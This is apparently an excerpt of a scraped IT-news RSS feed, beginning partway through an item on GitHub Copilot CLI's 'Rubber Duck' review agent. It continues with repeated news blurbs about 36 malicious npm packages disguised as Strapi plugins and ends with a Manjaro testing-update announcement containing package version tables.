<p>The new feature was announced <a href="https://github.blog/ai-and-ml/github-copilot/github-copilot-cli-combines-model-families-for-a-second-opinion/">April 6</a>. Introduced in experimental mode, Rubber Duck leverages a second model from a different AI family to act as an independent reviewer, assessing plans and work at the moments where feedback matters most, according to GitHub. Rubber Duck is a focused review agent, powered by a model from a complementary family to a primary Copilot session. The job of Rubber Duck is to check the agent’s work and present a short, focused list of high-value concerns including details the primary agent may have missed, assumptions worth questioning, and edge cases to consider.</p>



<p>Developers can use<code>/experimental</code>in the Copilot CLI to access Rubber Duck alongside other experimental features.</p>



<p>Evaluating Rubber Duck on <a href="https://www.swebench.com/">SWE-Bench Pro</a>, a benchmark of real-world coding problems drawn from open-source repositories, GitHub found that Claude Sonnet 4.6 paired with Rubber Duck running GPT-5.4 achieved a resolution rate approaching Claude Opus 4.6 running alone, closing 74.7% of the performance gap between Sonnet and Opus. GitHub said Rubber Duck tends to help more with difficult problems, ones that span three-plus files and would normally take 70-plus steps. On these problems, Sonnet plus Rubber Duck scores 3.8% higher than the Sonnet baseline and 4.8% higher on the hardest problems identified across three trials. </p>



<p>GitHub cited these examples of the kinds of problems Rubber Duck finds:</p>



<ul class="wp-block-list">
<li>Architectural catch (OpenLibrary/async scheduler): Rubber Duck caught that the proposed scheduler would start and immediately exit, running zero jobs—and that even if fixed, one of the scheduled tasks was itself an infinite loop. </li>



<li>One-liner bug (OpenLibrary/Solr): Rubber Duck caught a loop that silently overwrote the same <code>dict</code> key on every iteration. Three of four Solr facet categories were being dropped from every search query, with no error thrown. </li>



<li>Cross-file conflict (NodeBB/email confirmation): Rubber Duck caught three files that all read from a Redis key which the new code stopped writing. The confirmation UI and cleanup paths would have been silently broken on deploy.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researchers Uncover 36 Rogue npm Packages Delivering Redis RCE and Persistent Malware]]></title>
<description><![CDATA[Cybersecurity researchers have uncovered a sophisticated supply-chain attack involving 36 malicious npm packages masquerading as plugins for the popular Strapi content management system. These packages were published using multiple fake developer accounts. They were designed to target real-world ...]]></description>
<link>https://tsecurity.de/de/3410564/it-security-nachrichten/researchers-uncover-36-rogue-npm-packages-delivering-redis-rce-and-persistent-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3410564/it-security-nachrichten/researchers-uncover-36-rogue-npm-packages-delivering-redis-rce-and-persistent-malware/</guid>
<pubDate>Mon, 06 Apr 2026 09:51:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity researchers have uncovered a sophisticated supply-chain attack involving 36 malicious npm packages masquerading as plugins for the popular Strapi content management system. These packages were published using multiple fake developer accounts. They were designed to target real-world production environments with advanced exploitation techniques. The malicious packages mimicked legitimate Strapi plugin naming conventions to trick […]</p>
<p>The post <a href="https://cyberpress.org/rogue-npm-packages-deliver-malware/">Researchers Uncover 36 Rogue npm Packages Delivering Redis RCE and Persistent Malware</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[36 Malicious npm Strapi Packages Used to Deploy Redis RCE and Persistent C2 Malware]]></title>
<description><![CDATA[A coordinated supply chain attack has been uncovered targeting developers who build applications on Strapi, a widely used open-source content management system. Thirty-six malicious npm packages disguised as legitimate Strapi plugins were published to the npm registry, carrying payloads designed…...]]></description>
<link>https://tsecurity.de/de/3410474/it-security-nachrichten/36-malicious-npm-strapi-packages-used-to-deploy-redis-rce-and-persistent-c2-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3410474/it-security-nachrichten/36-malicious-npm-strapi-packages-used-to-deploy-redis-rce-and-persistent-c2-malware/</guid>
<pubDate>Mon, 06 Apr 2026 09:06:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A coordinated supply chain attack has been uncovered targeting developers who build applications on Strapi, a widely used open-source content management system. Thirty-six malicious npm packages disguised as legitimate Strapi plugins were published to the npm registry, carrying payloads designed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/36-malicious-npm-strapi-packages-used-to-deploy-redis-rce-and-persistent-c2-malware/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/36-malicious-npm-strapi-packages-used-to-deploy-redis-rce-and-persistent-c2-malware/">36 Malicious npm Strapi Packages Used to Deploy Redis RCE and Persistent C2 Malware</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[36 Malicious npm Strapi Packages Used to Deploy Redis RCE and Persistent C2 Malware]]></title>
<description><![CDATA[A coordinated supply chain attack has been uncovered targeting developers who build applications on Strapi, a widely used open-source content management system. Thirty-six malicious npm packages disguised as legitimate Strapi plugins were published to the npm registry, carrying payloads designed ...]]></description>
<link>https://tsecurity.de/de/3410341/it-security-nachrichten/36-malicious-npm-strapi-packages-used-to-deploy-redis-rce-and-persistent-c2-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3410341/it-security-nachrichten/36-malicious-npm-strapi-packages-used-to-deploy-redis-rce-and-persistent-c2-malware/</guid>
<pubDate>Mon, 06 Apr 2026 07:50:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A coordinated supply chain attack has been uncovered targeting developers who build applications on Strapi, a widely used open-source content management system. Thirty-six malicious npm packages disguised as legitimate Strapi plugins were published to the npm registry, carrying payloads designed to exploit Redis for remote code execution, steal credentials, and establish persistent command-and-control access on […]</p>
<p>The post <a href="https://cybersecuritynews.com/36-malicious-npm-strapi-packages/">36 Malicious npm Strapi Packages Used to Deploy Redis RCE and Persistent C2 Malware</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[36 Malicious Strapi npm Packages Deliver Redis RCE, Persistent C2 Malware]]></title>
<description><![CDATA[A coordinated supply chain attack has been uncovered involving 36 malicious npm packages masquerading as Strapi CMS plugins, delivering a range of payloads including Redis remote code execution (RCE), credential harvesting, and persistent command-and-control (C2) malware. The campaign was carried...]]></description>
<link>https://tsecurity.de/de/3410282/it-security-nachrichten/36-malicious-strapi-npm-packages-deliver-redis-rce-persistent-c2-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3410282/it-security-nachrichten/36-malicious-strapi-npm-packages-deliver-redis-rce-persistent-c2-malware/</guid>
<pubDate>Mon, 06 Apr 2026 07:20:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A coordinated supply chain attack has been uncovered involving 36 malicious npm packages masquerading as Strapi CMS plugins, delivering a range of payloads including Redis remote code execution (RCE), credential harvesting, and persistent command-and-control (C2) malware. The campaign was carried…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/36-malicious-strapi-npm-packages-deliver-redis-rce-persistent-c2-malware/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/36-malicious-strapi-npm-packages-deliver-redis-rce-persistent-c2-malware/">36 Malicious Strapi npm Packages Deliver Redis RCE, Persistent C2 Malware</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[36 Malicious Strapi npm Packages Deliver Redis RCE, Persistent C2 Malware]]></title>
<description><![CDATA[A coordinated supply chain attack has been uncovered involving 36 malicious npm packages masquerading as Strapi CMS plugins, delivering a range of payloads including Redis remote code execution (RCE), credential harvesting, and persistent command-and-control (C2) malware. The campaign was carried...]]></description>
<link>https://tsecurity.de/de/3410261/it-security-nachrichten/36-malicious-strapi-npm-packages-deliver-redis-rce-persistent-c2-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3410261/it-security-nachrichten/36-malicious-strapi-npm-packages-deliver-redis-rce-persistent-c2-malware/</guid>
<pubDate>Mon, 06 Apr 2026 07:06:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A coordinated supply chain attack has been uncovered involving 36 malicious npm packages masquerading as Strapi CMS plugins, delivering a range of payloads including Redis remote code execution (RCE), credential harvesting, and persistent command-and-control (C2) malware. The campaign was carried out using four sock-puppet npm accounts umarbek1233, kekylf12, tikeqemif26, and umar_bektembiev1. Unlike typical npm spam […]</p>
<p>The post <a href="https://gbhackers.com/36-malicious-strapi-npm/">36 Malicious Strapi npm Packages Deliver Redis RCE, Persistent C2 Malware</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-03-31 - Linux 7.0-rc6, GNOME, Thunderbird, Deepin, Freecad, Wireplumber]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. This might mark the start of the development cycle of the upcoming ‘Bian-May’ release series. With this we aim to update the default kernel to 7.0 series. Also there will be Plasma 6.6 series, KDE Gears 26.04 and GNOME 50 ...]]></description>
<link>https://tsecurity.de/de/3409930/unix-server/testing-update-2026-03-31-linux-70-rc6-gnome-thunderbird-deepin-freecad-wireplumber/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3409930/unix-server/testing-update-2026-03-31-linux-70-rc6-gnome-thunderbird-deepin-freecad-wireplumber/</guid>
<pubDate>Mon, 06 Apr 2026 01:00:56 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. This might mark the start of the development cycle of the upcoming ‘Bian-May’ release series. With this we aim to update the default kernel to <a href="https://www.heise.de/en/news/Linux-Torvalds-starts-development-of-Kernel-7-0-11186358.html">7.0</a> series. Also there will be <a href="https://kde.org/announcements/plasma/6/6.6.0/">Plasma 6.6</a> series, <a href="https://community.kde.org/Schedules/KDE_Gear_26.04_Schedule">KDE Gears 26.04</a> and <a href="https://release.gnome.org/50/">GNOME 50</a> release series. XFCE will stay at <a href="https://www.xfce.org/about/tour420">4.20</a> this release cycle. A release of ‘Bian-May’ can be expected end of April, beginning of May. Let us know any issues you may found thus far …</p>
<h3><a name="p-850257-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-850257-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-850257-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-850257-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>
<h2><a name="p-850257-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-850257-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernel</strong> 7.0 got updated to <a href="https://lore.kernel.org/lkml/CAHk-=wgLvq1LucHhxjiPwDBkMRk=54Zh=-FmUdevXJyHygc=9A@mail.gmail.com/T/#u">7.0-rc6</a></li>
<li><strong>GNOME</strong> <a href="https://discourse.gnome.org/t/gnome-49-5-released/34574">49.5</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/thunderbird/149.0.1/releasenotes/">149.0.1</a></li>
<li>Some updates to <strong>Deepin</strong></li>
<li><strong>freecad</strong> <a href="https://blog.freecad.org/2026/03/25/freecad-version-1-1-released/">1.1.0</a></li>
<li>Rebuilds and updates to <strong>haskell</strong></li>
<li><strong>wireplumber</strong> <a href="https://gitlab.com/pipewire/wireplumber/-/blob/07e730b279ac7a520699ae9f6b0797848a731b30/NEWS.rst">0.5.14</a></li>
</ul>
<h2><a name="p-850257-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-850257-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux510 5.10.252</li>
<li>linux515 5.15.202</li>
<li>linux61 6.1.167</li>
<li>linux66 6.6.130</li>
<li>linux612 6.12.78</li>
<li>linux618 6.18.20</li>
<li>linux619 6.19.10</li>
<li>linux70 7.0.0rc6</li>
<li>linux61-rt 6.1.166_rt61</li>
<li>linux66-rt 6.6.129_rt70</li>
<li>linux612-rt 6.12.74_rt16</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (3/31/26 05:17 CEST)</p>
<ul>
<li>testing core x86_64:  3 new and 3 removed package(s)</li>
<li>testing extra x86_64:  1131 new and 1127 removed package(s)</li>
<li>testing multilib x86_64:  8 new and 8 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                             linux70           7.0.0rc5-1           7.0.0rc6-1
                     linux70-headers           7.0.0rc5-1           7.0.0rc6-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                                file               5.47-1               5.47-2


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                             discord          1:0.0.131-1                    -
                   linux70-acpi_call            1.2.2-0.5            1.2.2-0.6
                    linux70-bbswitch              0.8-0.5              0.8-0.6
                 linux70-broadcom-wl     6.30.223.271-0.5     6.30.223.271-0.6
                linux70-nvidia-470xx       470.256.02-0.5       470.256.02-0.6
                 linux70-nvidia-open        595.58.03-0.1        595.58.03-0.2
                       linux70-r8168         8.056.02-0.5         8.056.02-0.6
                   linux70-rtl8723bu         20250813-0.5         20250813-0.6
                    linux70-tp_smapi             0.45-0.5             0.45-0.6
                 linux70-vhba-module         20250329-0.5         20250329-0.6
     linux70-virtualbox-host-modules            7.2.6-0.5            7.2.6-0.6
                         linux70-zfs            2.4.1-0.5            2.4.1-0.6


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                          abseil-cpp         20250814.1-1         20260107.1-1
                               afl++              4.35c-2              4.40c-1
                                agda          2.6.4.3-119          2.6.4.3-121
                          aliyun-cli              3.2.9-1              3.3.3-1
                              allure         0.11.0.0-317         0.11.0.0-320
                          amdgpu_top             0.11.2-1             0.11.3-1
                       android-tools            35.0.2-23            35.0.2-24
                          apache-orc              2.3.0-2              2.3.0-3
                                apko             1.1.16-1              1.2.0-1
                               arbtt         0.12.0.3-185         0.12.0.3-187
                             arch-hs            0.12.1-66            0.12.1-70
                      argo-workflows              4.0.2-1              4.0.3-1
                               arrow             23.0.1-2             23.0.1-3
                             astroid               0.17-8               0.17-9
                           astroterm             1.0.10-1              1.1.0-1
                           aws-vault              7.9.7-1             7.9.13-1
                              azcopy            10.32.1-1            10.32.2-1
                       bbswitch-dkms              0.8-806              0.8-807
                       bcachefs-dkms           3:1.37.3-1           3:1.37.4-1
                      bcachefs-tools           3:1.37.3-1           3:1.37.4-1
                               beets              2.7.1-1              2.8.0-1
                               bftpd                6.3-1                6.6-1
                              bloaty               1.1-22               1.1-23
                            bpftrace             0.25.0-1             0.25.1-1
                                brat              0.9.0-2             0.10.0-1
                                 bun             1.3.11-1             1.3.11-2
                               byobu               6.14-1               6.15-1
                       cabal-install          3.10.3.0-15          3.10.3.0-18
                          cabal-plan          0.7.3.0-128          0.7.3.0-130
                      cargo-binstall             1.17.8-2             1.17.9-1
                         cargo-insta             1.47.0-1             1.47.2-1
                        cargo-update             18.2.0-2             19.0.1-1
                             castxml              0.7.0-1              0.7.0-2
                           cbor-tool          0.2.3.0-124          0.2.3.0-126
                              ccache             4.13.1-1             4.13.2-1
                               cgrep             8.1.0-94             8.1.0-97
                              chatty              0.8.9-1              0.8.9-2
                          cherrytree              1.6.3-1              1.6.3-2
                           clash-ghc             1.8.2-97            1.8.2-100
                          cockatrice             2.10.3-1             2.10.3-2
                               crash              9.0.1-1              9.0.1-2
                             cryptol             3.3.0-47             3.3.0-50
                                 cue             0.15.4-1             0.16.0-1
                    curl-impersonate              1.5.1-1              1.5.2-1
                                cyme             2.2.11-2              2.3.0-1
                               darcs           2.18.5-191           2.18.5-194
                             dbeaver             26.0.0-1             26.0.1-1
                     deepin-anything             6.2.11-1              7.0.0-2
                deepin-anything-dkms             6.2.11-1              7.0.0-2
                          deepin-api             6.0.35-1             6.0.37-1
                 deepin-app-services             1.0.40-1             1.0.41-1
          deepin-application-manager             1.2.42-1             1.2.44-1
                     deepin-calendar             6.5.17-1             6.5.18-1
                    deepin-clipboard              6.1.7-1              6.1.8-1
                   deepin-compressor              6.5.9-1             6.5.11-1
               deepin-control-center             6.1.13-1             6.1.15-1
                       deepin-daemon             6.1.46-4             6.1.49-1
                deepin-desktop-theme             1.1.16-1             1.1.18-1
             deepin-device-formatter           0.0.1.18-2              1.5.1-1
                         deepin-draw             6.5.25-1             6.5.26-1
                       deepin-editor             6.5.41-1             6.5.42-1
                 deepin-grand-search              5.4.7-3              5.4.9-1
                    deepin-launchpad             2.0.25-3             2.0.26-1
                        deepin-movie          1:5.10.45-1          1:5.10.46-1
                 deepin-network-core             2.0.42-1             2.0.43-1
               deepin-qt5integration             5.7.30-2             6.7.31-1
          deepin-qt5platform-plugins             5.7.30-2             6.7.31-1
               deepin-qt6integration             6.0.48-3             6.7.31-1
          deepin-qt6platform-plugins             6.0.48-3             6.7.31-1
                  deepin-screensaver             5.0.19-2             5.0.20-1
                     deepin-services             1.0.19-1             1.0.21-1
                      deepin-session             2.0.15-2             2.0.17-1
                        deepin-shell             2.0.27-3             2.0.29-1
               deepin-system-monitor             6.5.19-2             6.5.21-1
                     deepin-terminal             6.5.28-3             6.5.29-1
                  deepin-tray-loader             2.0.24-3             2.0.26-1
                        deepin-turbo            0.0.6.2-1            0.0.6.3-1
                     deepin-util-dfm             1.2.29-1             1.2.31-1
                   deepin-wallpapers            1:1.7.8-1           1:1.7.14-1
                      deepin-widgets             6.0.18-2             6.0.20-1
                               dhall            1.42.3-45            1.42.3-48
                          dhall-bash           1.0.41-176           1.0.41-180
                          dhall-docs           1.0.12-168           1.0.12-171
                          dhall-json           1.7.12-172           1.7.12-175
                    dhall-lsp-server            1.1.4-102            1.1.4-106
                          dhall-yaml           1.2.12-177           1.2.12-180
                       diff-so-fancy              1.4.6-1              1.4.8-1
                          diffoscope                313-1                315-1
                             discord          1:0.0.130-1          1:0.0.131-1
                             dovecot              2.4.3-1              2.4.3-2
                               drone             2.28.0-1             2.28.1-1
                           drone-oss             2.28.0-1             2.28.1-1
                            dtk6core           1:6.7.32-2           1:6.7.33-1
                     dtk6declarative           1:6.7.32-2           1:6.7.33-1
                             dtk6gui           1:6.7.32-2           1:6.7.33-1
                             dtk6log             6.7.32-2             6.7.33-1
                          dtk6widget           1:6.7.32-2           1:6.7.33-1
                             dtkcore           1:6.7.32-2           1:6.7.33-1
                      dtkdeclarative           1:6.7.32-2           1:6.7.33-1
                              dtkgui           1:6.7.32-2           1:6.7.33-1
                              dtklog             6.7.32-2             6.7.33-1
                           dtkwidget           1:6.7.32-2           1:6.7.33-1
                               dunst             1.13.1-1             1.13.2-1
                         easyeffects              8.1.7-1              8.1.8-1
                              emptty             0.16.0-1             0.16.1-1
               evolution-data-server             3.58.3-1             3.58.3-2
          evolution-data-server-docs             3.58.3-1             3.58.3-2
                  falcosecurity-libs             0.20.0-9             0.23.1-1
                           fastfetch             2.60.0-1             2.61.0-1
           firefox-developer-edition            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-ach            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-af            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-an            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ar            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-ast            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-az            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-be            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bg            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bn            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-br            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ca            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ca-valencia      150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-cak            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-cs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-cy            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-da            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-de            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-dsb            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-el            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-ca            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-gb            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-us            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-eo            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-ar            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-cl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-es            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-mx            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-et            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-eu            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fa            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ff            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fi            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-fur            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-fy-nl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ga-ie            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gd            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gn            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-gu-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-he            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-hi-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-hr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-hsb            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-hu            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-hy-am            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ia            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-id            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-is            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-it            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ja            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ka            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-kab            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-kk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-km            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-kn            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ko            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-lij            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-lt            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-lv            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-mk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-mr            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ms            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-my            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-nb-no            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ne-np            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-nl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-nn-no            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-oc            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pa-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-pl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pt-br            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pt-pt            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-rm            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ro            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ru            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-sat            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sc            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-sco            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-si            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sk            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-skr            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sl            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-son            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sq            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sr            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-sv-se            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-szl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ta            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-te            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tg            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-th            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-trs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-uk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ur            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-uz            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-vi            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-xh            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-zh-cn            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-zh-tw            150.0b2-1            150.0b3-1
                             freecad             1.0.2-10              1.1.0-2
                      freeciv-common              3.2.2-6              3.2.4-1
                        freeciv-gtk3              3.2.2-6              3.2.4-1
                        freeciv-gtk4              3.2.2-6              3.2.4-1
                          freeciv-qt              3.2.2-6              3.2.4-1
                           ft2-clone               2.12-1               2.13-1
                                 gdb               17.1-2               17.1-3
                          gdb-common               17.1-2               17.1-3
                                gegl             0.4.68-1             0.4.70-1
                          gemini-cli           1:0.35.2-1           1:0.35.3-1
                                gimp              3.2.0-1              3.2.2-1
                           git-annex       10.20251215-14       10.20251215-19
